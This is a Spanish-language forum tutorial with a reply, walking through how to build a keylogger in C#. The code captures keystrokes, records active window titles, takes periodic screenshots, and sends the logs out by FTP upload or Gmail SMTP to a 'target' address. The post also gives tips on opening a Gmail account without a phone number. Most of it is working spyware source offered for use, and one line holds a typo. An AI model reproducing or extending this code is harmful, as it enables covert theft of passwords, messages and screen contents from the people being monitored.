Foro de elhacker.net

Programación => .NET (C#, VB.NET, ASP) => Mensaje iniciado por: BigBear en 5 Septiembre 2014, 18:38 pm



Título: [C#] Creacion de un Keylogger
Publicado por: BigBear en 5 Septiembre 2014, 18:38 pm
[Titulo] : Creacion de un Keylogger
[Lenguaje] : C#
[Autor] : Doddy Hackman

[Temario]

-- =================--------

0x01 : Introduccion
0x02 : Capturar Teclas
0x03 : Capturar el nombre de las ventanas activas
0x04 : Tomar un ScreenShot de la pantalla
0x05 : Subir logs a un servidor FTP
0x06 : Mandar logs por Mail
0x07 : Probando el programa

-- =================--------

0x01 : Introduccion

Hola , hoy les traigo un manual sobre como hacer un keylogger en C# , en este manual les voy a enseñar o por lo menos lo voy a intentar sobre como capturar las teclas , nombres de las ventanas , tomar un screenshot de la pantalla para despues mandar los logs por Mail (usando Gmail) o subirlos a un servidor FTP.

Empecemos ...

Para empezar el keyloger tenemos que crear primero un nuevo proyecto de la siguiente forma :

Archivo -> Nuevo -> Proyecto -> Elegimos Aplicacion de Windows Forms y le damos en aceptar

Como en la siguiente imagen :

(http://doddyhackman.webcindario.com/images/makeprokey.jpg)

Una vez creado el proyecto vamos hacer el formulario completo para hacerlo de una para esto tienen que usar :

Los primeros 6 botones con el texto del boton :

Boton 1 - "Capture Keys ON"
Boton 2 - "Capture Keys OFF"

Boton 3 - "Capture Windows ON"
Boton 4 - "Capture Windows OFF"

Boton 5 - "Capture Screen ON"
Boton 6 - "Capture Screen OFF"

Ahora pongan 3 labels con el texto de "OFF" abajo de cada funcion : keys,windows,screen.

Para terminar pongan dos botones finales con el siguiente texto :

Boton 7 - "Send logs for FTP"
Boton 8 - "Send logs for Mail"

Quedando algo asi :

(http://doddyhackman.webcindario.com/images/keyformnow.jpg)

Si quieren pueden ponerle como texto "Keylogger in C#" al formulario como en la imagen pero no es importante.

0x02 : Capturar Teclas

Para poder capturar teclas necesitan poner este "using" al inicio del codigo para poder usar GetAsyncKeyState() :
 
Código
  1. using System.Runtime.InteropServices;
  2.  

Despues lo mas importante es agregar estas lineas despues de los "using" :

Código
  1.        [DllImport("User32.dll")]
  2.        private static extern short GetAsyncKeyState(Keys teclas);
  3.        [DllImport("user32.dll")]
  4.        private static extern short GetAsyncKeyState(Int32 teclas);
  5.        [DllImport("user32.dll")]
  6.        private static extern short GetKeyState(Keys teclas);
  7.        [DllImport("user32.dll")]
  8.        private static extern short GetKeyState(Int32 teclas);
  9.  

Para poder escribir los logs en un html necesitan usar mi funcion traducida originalmente desde perl a python,ruby,delphi y finalmente C# :

Código
  1.        public void savefile(string file, string texto)
  2.        {
  3.            //Function savefile() Coded By Doddy Hackman
  4.            try
  5.            {
  6.                System.IO.StreamWriter save = new System.IO.StreamWriter(file, true); // Abrimos para escribir en el archivo marcado
  7.                save.Write(texto); // Escribimos en el archivo marcado con lo que hay en la variable texto
  8.                save.Close(); // Cerramos el archivo
  9.            }
  10.            catch
  11.            {
  12.                //
  13.            }
  14.        }
  15.  

Ahora tenemos que agregar el primer timer al formulario solo van al cuadro de herramientas y lo arrastran al formulario.
Como va a ser el primero timer tendra el name de timer1 , entonces hacemos doble click timer1 para agregar el siguiente codigo.

Código
  1.        private void timer1_Tick(object sender, EventArgs e)
  2.        {
  3.  
  4.            // Keylogger Based on http://www.blackstuff.net/f44/c-keylogger-4848/
  5.            // Thanks to Carlos Raposo
  6.  
  7.            for (int num = 0; num <= 255; num++) // Usamos el int num para recorrer los numeros desde el 0 al 255
  8.            {
  9.                int numcontrol = GetAsyncKeyState(num);  // Usamos GetAsyncKeyState para verificar si una tecla fue presionada usando el int numcontrol  
  10.                if (numcontrol == -32767) // Verificamos si numcontrol fue realmente presionado controlando que numcontrol sea -32767  
  11.                {
  12.                    if (num >= 65 && num <= 122) // Si el int num esta entre 65 y 122 ...
  13.                    {
  14.                        if (Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey)) && Convert.ToBoolean(GetKeyState(Keys.CapsLock)))
  15.                        {
  16.                            // Si se detecta Shift y CapsLock ...
  17.                            string letra = Convert.ToChar(num+32).ToString(); // Le sumamos 32 a num y la convertimos a Char para formar la letra minuscula
  18.                            savefile("logs.html", letra); // Agregamos la letra al archivo de texto
  19.                        }
  20.                        else if (Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey)))
  21.                        {
  22.                            // Si se detecta Shift o CapsLock
  23.                            string letra = Convert.ToChar(num).ToString(); // Formamos la letra convirtiendo num a Char
  24.                            savefile("logs.html", letra); // Agregamos la letra al archivo de texto
  25.                        }
  26.                        else if (Convert.ToBoolean(GetKeyState(Keys.CapsLock)))
  27.                        {
  28.                            // Si se detecta CapsLock ...
  29.                            string letra = Convert.ToChar(num).ToString(); // Formamos la letra convirtiendo num a Char
  30.                            savefile("logs.html", letra); // Agregamos la letra al archivo de texto
  31.  
  32.                        }
  33.                        else
  34.                        {
  35.                            // Si no se detecta ni Shift ni CapsLock ...
  36.                            string letra = Convert.ToChar(num j+ 32).ToString(); // Formamos la letra minuscula sumandole 32 a num y convirtiendo num a Char
  37.                            savefile("logs.html", letra); // Agregamos la letra al archivo de texto
  38.                        }
  39.                    }
  40.  
  41.                }
  42.            }
  43.  
  44.        }
  45.  

Se deberia ver algo asi :

(http://doddyhackman.webcindario.com/images/keyformkeys.jpg)

Como ven en este codigo explico como detectar mayusculas y minisculas , ya sea por Shift o CapsLock este codigo las detecta igual y guardas las teclas un log html usando la funcion savefile().

Ahora le hacemos doble click al primer boton , es el que activa la captura de las teclas "Capture Keys ON" , para poder poner el siguiente codigo :

Código
  1.        private void button1_Click(object sender, EventArgs e)
  2.        {
  3.            timer1.Enabled = true; // Activamos el timer1
  4.            label1.Text = "ON"; // Ponemos "ON" como texto en label1
  5.        }
  6.  

Con este codigo vamos a poder activar la captura de las teclas pero para poder desactivar el timer y que no siga capturando tenemos que hacer doble click en el segundo boton , el que dice "Capture Keys OFF" para poner este codigo :

Código
  1.        private void button2_Click(object sender, EventArgs e)
  2.        {
  3.            timer1.Enabled = false; // Desactivamos el timer1
  4.            label1.Text = "OFF";// Ponemos "OFF" como texto en label2
  5.        }
  6.  

Con eso ya estaria la captura de teclas mayusculas y minusculas.

0x03 : Capturar el nombre de las ventanas activas

Para poder capturar el nombre de las ventanas activas tenemos que declarar las siguiente variables globales al inicio del codigo :

Código
  1.        string nombre1 = ""; // Declaramos la variable string nombre1 como vacia ("")
  2.        string nombre2 = ""; // Declaramos  la variable string nombre2 como vacia ("")
  3.  

Estas lineas son necesarias para guardar los nombres de las ventanas y comparar para saber cual es la actual , para poder capturar el nombres de las ventanas activas tambien tenemos que agregar estas lineas al inicio del codigo :

Código
  1.        [DllImport("user32.dll")]
  2.        static extern IntPtr GetForegroundWindow();
  3.  
  4.        [DllImport("user32.dll")]
  5.        static extern int GetWindowText(IntPtr ventana, StringBuilder cadena, int cantidad);
  6.  


Ahora tenemos que agregar el segundo timer al formulario , para hacerle doble click y agregar el siguiente  codigo :

Código
  1.        private void timer2_Tick(object sender, EventArgs e)
  2.        {
  3.            const int limite = 256; // Declaramos un entero constante con valor de 256
  4.            StringBuilder buffer = new StringBuilder(limite); // Declaramos un StringBuilder en buffer usando el int limite
  5.            IntPtr manager = GetForegroundWindow(); // Declaramos manager como IntPtr usando GetForegroundWindow para poder
  6.                                                    // obtener el nombre de la ventana actual
  7.  
  8.            if (GetWindowText(manager, buffer, limite) > 0) // Obtenemos el nombre de la ventana y lo almacenamos en buffer
  9.            {
  10.                nombre1 = buffer.ToString(); // Almacenamos el nombre de la ventana en nombre1
  11.  
  12.                if (nombre1 != nombre2) // Si nombre1 y nombre2 no son iguales ...
  13.                {
  14.                    nombre2 = nombre1; // nombre2 tendra el valor de nombre1
  15.                    savefile("logs.html", "<br>[" + nombre2 + "]<br>"); // Agregamos el nombre de la ventana en el archivo de texto
  16.                }
  17.            }
  18.  
  19.        }
  20.  

Como en la siguiente imagen :

(http://doddyhackman.webcindario.com/images/keyformsven.jpg)

Ahora hacemos doble click en el tercer boton que se llama "Capture Windows ON" para poner el siguiente codigo :

Código
  1.        private void button3_Click(object sender, EventArgs e)
  2.        {
  3.            timer2.Enabled = true; // Activamos el timer2
  4.            label2.Text = "ON"; //Ponemos "ON" como texto en label2
  5.        }
  6.  

Despues de eso hacemos doble click en el cuarto boton que se llama "Capture Windows OFF" para poner el siguiente codigo :

Código
  1.        private void button4_Click(object sender, EventArgs e)
  2.        {
  3.            timer2.Enabled = false; // Desactivamos el timer2
  4.            label2.Text = "OFF"; // Ponemos "OFF" como texto en label2
  5.        }
  6.  

Con esto terminariamos la funcion de capturar las ventanas activas.

0x04 : Tomar un ScreenShot de la pantalla

Para esta funcion lo primero que hay que hacer es agregar esta linea al inicio del codigo :

Código
  1. using System.Drawing.Imaging;
  2.  

Bien ahora para que el programa capture la pantalla cada cierto tiempo tenemos que agregar el tercer timer al formulario para ponerle como tiempo o Interval un valor de "10000" que serian 10 segundos porque el interval exige que el tiempo sea expresado en milisegundos.
Despues de eso agregan esta funcion al inicio del codigo llamada screeshot() :

Código
  1.        public void screenshot(string nombre)
  2.        {
  3.            try
  4.            {
  5.                // ScreenShot Based on : http://www.dotnetjalps.com/2007/06/how-to-take-screenshot-in-c.html
  6.                // Thanks to Jalpesh vadgama
  7.  
  8.                int wid = Screen.GetBounds(new Point(0, 0)).Width; // Declaramos el int wid para calcular el tamaño de la pantalla
  9.                int he = Screen.GetBounds(new Point(0, 0)).Height; // Declaramos el int he para calcular el tamaño de la pantalla
  10.                Bitmap now = new Bitmap(wid, he); // Declaramos now como Bitmap con los tamaños de la pantalla
  11.                Graphics grafico = Graphics.FromImage((Image)now); // Declaramos grafico como Graphics usando el declarado now
  12.                grafico.CopyFromScreen(0, 0, 0, 0, new Size(wid, he)); // Copiamos el screenshot con los tamaños de la pantalla
  13.                // usando "grafico"
  14.                now.Save(nombre, ImageFormat.Jpeg); // Guardamos el screenshot con el nombre establecido en la funcion
  15.            }
  16.            catch
  17.            {
  18.                //
  19.            }
  20.  
  21.        }
  22.  

Para despues hacer doble click en el timer3 y poner el siguiente codigo :

Código
  1.        private void timer3_Tick(object sender, EventArgs e)
  2.        {
  3.            string fecha = DateTime.Now.ToString("h:mm:ss tt"); // Obtemos la hora actual usando DateTime y la guardamos en la
  4.                                                                // variable string con el nombre de fecha
  5.            string nombrefinal = fecha.Trim() + ".jpg"; // Limpiamos la variable fecha de los espacios en blanco y le agregamos
  6.                                                        // ".jpg" al final para terminar de generar el nombre de la imagen
  7.            string final = nombrefinal.Replace(":", "_"); // Reemplazamos los ":" de la hora por "_" para que no haya problemas
  8.                                                          // al crear la imagen
  9.            screenshot(final); // Usamos la funcion screenshot() para mandar el nombre de la imagen que tiene la variable "final"
  10.                               // y asi realizar el screenshot
  11.  
  12.        }
  13.  

Viendose asi en el codigo :

(http://doddyhackman.webcindario.com/images/keyformscreen.jpg)

Ahora la parte que me estaba olvidando hagan doble click en el quinto boton , el que tiene como texto "Capture Screen ON" y
pongan el siguiente codigo :

Código
  1.            timer3.Enabled = true; // Activamos el timer3
  2.            label3.Text = "ON";  // Ponemos "ON" como texto en label3
  3.  

Ahora hagan doble click en el sexto boton , el que tiene como texto "Capture Screen OFF" y pongan el siguiente codigo :

Código
  1.            timer3.Enabled = false; // Desactivamos el timer3
  2.            label3.Text = "OFF";  // Ponemos "OFF" como texto en label3
  3.  


Con esto ya estaria terminada la parte de la captura de pantalla cada cierto tiempo , en este caso son cada 10 segundos.

0x05 : Subir logs a un servidor FTP

Bien , ahora para poder enviar logs por FTP necesitamos agregar estas lineas al inicio del codigo :

Código
  1. using System.Net;
  2. using System.IO;
  3.  

Despues de uso tambien tenemos que agregar esta funcion al inicio del codigo que sirve para subir archivos a un servidor FTP marcado :

Código
  1.        public void FTP_Upload(string servidor, string usuario, string password, string archivo)
  2.        {
  3.            // Based on : http://madskristensen.net/post/simple-ftp-file-upload-in-c-20
  4.  
  5.            try
  6.            {
  7.                WebClient ftp = new System.Net.WebClient(); // Iniciamos una instancia WebClient con "ftp"
  8.                ftp.Credentials = new System.Net.NetworkCredential(usuario, password); // Establecemos el login
  9.  
  10.                FileInfo dividir = new FileInfo(archivo); // Iniciamos una instancia FileInfo con "dividir"
  11.                string solo_nombre = dividir.Name; // Capturamos solo el nombre de la ruta del archivo de "archivo"
  12.  
  13.                ftp.UploadFile("ftp://"+servidor + "/" + solo_nombre, "STOR", archivo); // Subimos el archivo marcado con el siguiente
  14.                // formato -> ftp://localhost/archivo-a-subir.txt al servidor FTP
  15.            }
  16.            catch
  17.            {
  18.                //
  19.            }
  20.        }
  21.  

Ahora vamos hacer doble click sobre el septimo boton que tiene como texto "Send logs for FTP" para poner el siguiente codigo :

Código
  1.        private void button7_Click(object sender, EventArgs e)
  2.        {
  3.            FTP_Upload("localhost", "admin", "admin","logs.html"); // Usamos la funcion FTP_Upload para enviar el log por FTP
  4.                                                                                        // con los datos del servidor marcados
  5.        }
  6.  

Como ven tenemos "localhost" como servidor FTP y "admin" como usuario y password del servidor FTP , al final de la funcion tenemos "logs.html" que son los logs creados por el keylogger y listos para enviar al servidor FTP correspondiente.
Para probarlos en su servidor FTP tienen que cambiar los valores de servidor , usuario y password.

Pasemos al siguiente punto

0x06 : Mandar logs por Mail

Ahora vamos a ver como enviar los logs por mail , para poder hacerlo necesitan una cuenta en Gmail , si quieren registrarse en Gmail sin dar el telefono tienen que registrarte poniendo como direccion de correo alternativa una que sea con "@gmail.com" , en mi caso tambien puse la nacionalidad de Estados Unidos , no se si hace falta pero yo lo hice igual y safe de que me pidieran el telefono (no lo voy a dar ni muerto xD).
Bien para poder enviar correos usando Gmail necesitamos poner esta linea al inicio del codigo :

Código
  1. using System.Net.Mail;
  2.  

Despues tenemos que poner esta funcion al inicio del codigo que es la que uso para enviar Mails a Gmail :

Código
  1.        public void Gmail_Send(string usuario, string password, string target, string asunto, string mensaje_texto, string rutaarchivo)
  2.        {
  3.  
  4.            // Based on : http://www.codeproject.com/Tips/160326/Using-Gmail-Account-to-Send-Emails-With-Attachment
  5.  
  6.            MailAddress de = new MailAddress(usuario); // Establecemos la direccion de correo nuestra de Gmail para enviar el mail
  7.            MailAddress a = new MailAddress(target); // Establecemos la direccion de correo que va a recibir el correo
  8.  
  9.            MailMessage mensaje = new MailMessage(de, a); // Creamos la instancia MailMessage como "mensaje"  
  10.  
  11.            mensaje.Subject = asunto; // Establecemos en el mensaje el asunto
  12.            mensaje.Body = mensaje_texto; // Establecemos en el mensaje el texto del correo
  13.  
  14.            Attachment archivo = new Attachment(rutaarchivo); // Creamos la instancia Attachment como "archivo" donde marcamos la ruta del archivo adjunto que
  15.            // esta en la variable "rutaarchivo"
  16.  
  17.            mensaje.Attachments.Add(archivo); // Agregamos el archivo adjunto cargado anteriormente al "mensaje"
  18.  
  19.            SmtpClient gmailsender = new SmtpClient("smtp.gmail.com", 587); // Creamos la instancia SmtpClient como "gmailsender" ademas marcamos el host y
  20.            // el puerto de Gmail
  21.  
  22.            gmailsender.UseDefaultCredentials = false; // Desactivamos el UseDefaultCredentials en el "gmailsender"
  23.            gmailsender.EnableSsl = true; // Activamos el SSL en el "gmailsender"
  24.            gmailsender.Credentials = new NetworkCredential(usuario, password); // Establecemos el usuario y password de la cuenta nuestra de Gmail
  25.  
  26.            gmailsender.Send(mensaje); // Enviamos el mensaje  
  27.  
  28.        }
  29.  

Despues de eso hacemos doble click sobre el octavo y ultimo boton que tiene como texto "Send logs for Mail" para poner el siguiente codigo :

Código
  1.        private void button8_Click(object sender, EventArgs e)
  2.        {
  3.            Gmail_Send("tucorreo@gmail.com", "tupass", "target@hotmail.com", "Aca van los logs", "Disfruta los logs", "logs.html");
  4.            // Usamos la funcion Gmail_Send para enviar el log por Mail usando nuestra cuenta de Gmail con los datos aclarados en los argumentos de la funcion
  5.        }
  6.  

Como ven en la funcion tenemos como argumentos , el correo y password de nuestra cuenta gmail que usamos para enviar los logs , despues tenemos el correo donde van a llegar los logs , despues tenemos el titulo del mensaje que es "Aca van los logs" y el contenido del mensaje donde tenemos "Disfruta los logs" y para terminar tenemos la ruta de los logs del keylogger que es "logs.html".

Con eso pasamos el ultimo punto.

0x07 : Probando el programa

Bueno , creo que con esto cubrimos lo que es un keylogger basico (eso creo) , para probar solo tenemos que activar la captura de teclas , captura de ventanas y captura de screenshots desde su boton correspondiente , si queremos parar cierta funcion solo tenemos que hacer click sobre el boton de abajo correspondiente.

Se les deberia ver tal cual lo hicimos en el primer punto :

(http://doddyhackman.webcindario.com/images/keyformnow.jpg)

Para mandar los logs por FTP solo hagan click en el boton "Send logs for FTP" y despues de unos segundos tendran subidos los logs al servidor FTP que marcaron en la funcion del punto anterior.

En mi servidor FTP local se puede ver como se subieron los logs : logs.html

(http://doddyhackman.webcindario.com/images/keyformtestftp.jpg)

Lo mismo con el envio de logs por Mail con la diferencia de que ahora tienen que hacer click en el boton "Send logs for Mail" les dejo un ejemplo donde envio los logs a mi correo en hotmail :

(http://doddyhackman.webcindario.com/images/keyformtestmail.jpg)

Si quieren pueden ver los logs en formato HTML , en mi caso podre leer algo como esto en Firefox :

(http://doddyhackman.webcindario.com/images/keyformkeytestfinal.jpg)

Creo que eso seria todo ...

--========--
  The End ?
--========--

Version PDF (http://doddyhackman.webcindario.com/descargas/keylogger_csharp.pdf).

Version VideoTutorial

tqgzL5rKkHA

Eso es todo.


Título: Re: [C#] Creacion de un Keylogger
Publicado por: XresH en 13 Septiembre 2014, 18:30 pm
Esta muy lindo el codigo, buen trabajo, sino te molesta tenia pensado en un futuro realizar un proyecto paralelo en Vb.NET no se si alguien del foro ya lo hizo?

Obvio basándome en tu idea y con los respectivos creditos, exponiendo el code para el foro.

Saludos.